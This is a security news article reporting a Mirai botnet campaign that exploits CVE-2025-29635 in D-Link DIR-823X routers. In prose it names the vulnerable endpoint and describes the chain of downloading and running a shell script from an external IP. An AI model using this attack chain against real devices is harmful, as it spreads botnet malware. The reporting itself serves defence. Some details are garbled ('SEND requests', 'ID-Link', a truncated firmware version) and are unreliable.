A new Mirai-based malware campaign takes full advantage of CVE-2025-29635, a critical command injection vulnerability affecting D-Link DIR-823X routers, to insert devices into the botnet.
CVE-2025-29635 allows an attacker to execute arbitrary commands on remote devices by sending a POST request to a vulnerable endpoint, which triggers a remote command execution (RCE).
Akamai’s SIRT, which discovered the Mirai campaign in March 2026, reports that, although the flaw was first disclosed 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting, this is the first time a working exploit in the wild has been seen.
“Akamai SIRT detected active D-Link command-line exploit attempts to inject CVE-2025-29635 into our global honeypot network in early March 2026,” reads Akamai’s report.
“This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via a corresponding function, which can trigger a remote command.”
Researchers who discovered the bug briefly published a proof-of-concept (PoC) exploit on GitHub, but later retracted it.
Akamai’s observations show attackers send SEND requests that change the directory to all writable paths, download a shell script (dlink.sh) from an external IP, and execute it.
Source: Akamai
The script includes a Mirai-based malware called “tuxnokill,” which supports multiple architectures.
In terms of capabilities, it includes the Mirai standard distributed denial-of-service (DDoS) attack repertoire, including TCP SYN/ACK/STOMP, UDP flooding, and HTTP null.
Akamai also discovered that the threat actor behind this campaign is also exploiting CVE-2023-1389, which affects TP-Link routers, and a different RCE flaw in ZTE ZXV10 H108L routers. The same attack pattern was observed in all of them, leading to the deployment of the Mirai payload.
Affected devices have reached end-of-life (EoL) in November 2024, so it is possible that the latest firmware available for the model does not address CVE-2025-29635. ID-Link doesn’t make exceptions when a working exploit is found, so it’s unlikely that the vendor will offer a fix now.
BleepingComputer has reached out to D-Link with questions about the reported activity and the status of the fix, and we’ll update this post as soon as we hear back.
Meanwhile, users of routers that have reached EoL are recommended to upgrade to a new model that enjoys active support and regular security updates, disable remote control portals if not needed, change default administrator passwords, and monitor unexpected configuration changes.
AI has tied four zero days to a single exploit that bypasses both renderer and OS sandboxes. A wave of new exploits is coming.
At the Automated Validation Conference (May 12 & 14), see how autonomous, context-rich validation finds usability, validates controls, and closes the correction loop.
Find Your Place
